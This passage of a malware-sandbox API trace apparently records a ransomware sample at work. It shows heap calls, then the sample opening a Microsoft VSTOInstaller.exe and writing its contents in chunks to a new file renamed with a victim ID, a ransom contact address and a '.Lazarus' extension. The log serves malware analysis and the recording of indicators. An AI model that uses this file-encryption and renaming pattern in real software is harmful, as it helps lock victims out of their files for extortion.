HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0103.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0103.944] AreFileApisANSI () returned 1 [0103.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe", lpUsedDefaultChar=0x0) returned 75 [0103.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0103.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.945] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0103.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.945] AreFileApisANSI () returned 1 [0103.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0103.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85c60 [0103.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0103.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.945] GetFileType (hFile=0x27c) returned 0x1 [0103.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0103.945] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0103.945] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0103.946] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0103.946] CloseHandle (hObject=0x27c) returned 1 [0103.946] AreFileApisANSI () returned 1 [0103.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0103.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x859e0 [0103.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0103.946] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.946] GetFileType (hFile=0x27c) returned 0x1 [0103.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0103.946] CloseHandle (hObject=0x27c) returned 1 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0103.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.947] AreFileApisANSI () returned 1 [0103.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85ee0 [0103.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0103.948] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888)) returned 1 [0103.948] AreFileApisANSI () returned 1 [0103.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.948] SetLastError (dwErrCode=0x0) [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0103.948] GetLastError () returned 0x0 [0103.948] SetLastError (dwErrCode=0x0) [0103.948] AreFileApisANSI () returned 1 [0103.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 137 [0103.948] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x112) returned 0x91c98 [0103.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x91c98, cchWideChar=137 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 137 [0103.948] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.949] GetFileType (hFile=0x27c) returned 0x1 [0103.949] AreFileApisANSI () returned 1 [0103.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0103.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x854e0 [0103.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0103.949] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.949] GetFileType (hFile=0x368) returned 0x1 [0103.949] SetLastError (dwErrCode=0x0) [0103.949] SetLastError (dwErrCode=0x0) [0103.949] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0103.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0103.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0103.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0103.952] GetLastError () returned 0x0 [0103.952] SetLastError (dwErrCode=0x0) [0103.953] GetLastError () returned 0x0 [0103.953] SetLastError (dwErrCode=0x0) [0103.953] GetLastError () returned 0x0 [0103.953] SetLastError (dwErrCode=0x0) [0103.953] GetLastError () returned 0x0 [0103.953] SetLastError (dwErrCode=0x0) [0103.953] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.954] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.955] GetLastError () returned 0x0 [0103.955] SetLastError (dwErrCode=0x0) [0103.955] GetLastError () returned 0x0 [0103.955] SetLastError (dwErrCode=0x0) [0103.955] GetLastError () returned 0x0 [0103.955] SetLastError (dwErrCode=0x0) [0103.955] GetLastError () returned 0x0 [0103.955] SetLastError (dwErrCode=0x0) [0103.955] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.955] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.956] GetLastError () returned 0x0 [0103.956] SetLastError (dwErrCode=0x0) [0103.956] GetLastError () returned 0x0 [0103.956] SetLastError (dwErrCode=0x0) [0103.956] GetLastError () returned 0x0 [0103.956] SetLastError (dwErrCode=0x0) [0103.956] GetLastError () returned 0x0 [0103.956] SetLastError (dwErrCode=0x0) [0103.956] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.956] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.957] GetLastError () returned 0x0 [0103.957] SetLastError (dwErrCode=0x0) [0103.957] GetLastError () returned 0x0 [0103.957] SetLastError (dwErrCode=0x0) [0103.957] GetLastError () returned 0x0 [0103.957] SetLastError (dwErrCode=0x0) [0103.957] GetLastError () returned 0x0 [0103.957] SetLastError (dwErrCode=0x0) [0103.957] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.957] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.957] GetLastError () returned 0x0 [0103.958] SetLastError (dwErrCode=0x0) [0103.958] GetLastError () returned 0x0 [0103.958] SetLastError (dwErrCode=0x0) [0103.958] GetLastError () returned 0x0 [0103.958] SetLastError (dwErrCode=0x0) [0103.958] GetLastError () returned 0x0 [0103.958] SetLastError (dwErrCode=0x0) [0103.958] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.958] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.958] GetLastError () returned 0x0 [0103.958] SetLastError (dwErrCode=0x0) [0103.959] GetLastError () returned 0x0 [0103.959] SetLastError (dwErrCode=0x0) [0103.959] GetLastError () returned 0x0 [0103.959] SetLastError (dwErrCode=0x0) [0103.959] GetLastError () returned 0x0 [0103.959] SetLastError (dwErrCode=0x0) [0103.959] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.959] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.959] GetLastError () returned 0x0 [0103.959] SetLastError (dwErrCode=0x0) [0103.959] GetLastError () returned 0x0 [0103.959] SetLastError (dwErrCode=0x0) [0103.960] GetLastError () returned 0x0 [0103.960] SetLastError (dwErrCode=0x0) [0103.960] GetLastError () returned 0x0 [0103.960] SetLastError (dwErrCode=0x0) [0103.960] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.960] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.960] GetLastError () returned 0x0 [0103.960] SetLastError (dwErrCode=0x0) [0103.960] GetLastError () returned 0x0 [0103.960] SetLastError (dwErrCode=0x0) [0103.961] GetLastError () returned 0x0 [0103.961] SetLastError (dwErrCode=0x0) [0103.961] GetLastError () returned 0x0 [0103.961] SetLastError (dwErrCode=0x0) [0103.961] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.961] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.961] GetLastError () returned 0x0 [0103.961] SetLastError (dwErrCode=0x0) [0103.961] GetLastError () returned 0x0 [0103.961] SetLastError (dwErrCode=0x0) [0103.961] GetLastError () returned 0x0 [0103.961] SetLastError (dwErrCode=0x0) [0103.962] GetLastError () returned 0x0 [0103.962] SetLastError (dwErrCode=0x0) [0103.962] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.962] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.962] GetLastError () returned 0x0 [0103.962] SetLastError (dwErrCode=0x0) [0103.962] GetLastError () returned 0x0 [0103.962] SetLastError (dwErrCode=0x0) [0103.962] GetLastError () returned 0x0 [0103.962] SetLastError (dwErrCode=0x0) [0103.962] GetLastError () returned 0x0 [0103.962] SetLastError (dwErrCode=0x0) [0103.963] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.963] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.963] GetLastError () returned 0x0 [0103.963] SetLastError (dwErrCode=0x0) [0104.084] GetLastError () returned 0x0 [0104.084] SetLastError (dwErrCode=0x0) [0104.084] GetLastError () returned 0x0 [0104.084] SetLastError (dwErrCode=0x0) [0104.084] GetLastError () returned 0x0 [0104.085] SetLastError (dwErrCode=0x0) [0104.085] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.085] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.085] GetLastError () returned 0x0 [0104.085] SetLastError (dwErrCode=0x0) [0104.085] GetLastError () returned 0x0 [0104.085] SetLastError (dwErrCode=0x0) [0104.085] GetLastError () returned 0x0 [0104.085] SetLastError (dwErrCode=0x0) [0104.085] GetLastError () returned 0x0 [0104.086] SetLastError (dwErrCode=0x0) [0104.086] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.086] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.086] GetLastError () returned 0x0 [0104.086] SetLastError (dwErrCode=0x0) [0104.086] GetLastError () returned 0x0 [0104.086] SetLastError (dwErrCode=0x0) [0104.086] GetLastError () returned 0x0 [0104.086] SetLastError (dwErrCode=0x0) [0104.086] GetLastError () returned 0x0 [0104.086] SetLastError (dwErrCode=0x0) [0104.087] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.087] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.087] GetLastError () returned 0x0 [0104.087] SetLastError (dwErrCode=0x0) [0104.087] GetLastError () returned 0x0 [0104.087] SetLastError (dwErrCode=0x0) [0104.087] GetLastError () returned 0x0 [0104.087] SetLastError (dwErrCode=0x0) [0104.087] GetLastError () returned 0x0 [0104.087] SetLastError (dwErrCode=0x0) [0104.087] ReadFile (in: hFile=0x368, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.088] WriteFile (in: hFile=0x27c, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.088] GetLastError () returned 0x0 [0104.088] SetLastError (dwErrCode=0x0) [0104.088] GetLastError () returned 0x0 [0104.088] SetLastError (dwErrCode=0x0) [0104.088] GetLastError () returned 0x0 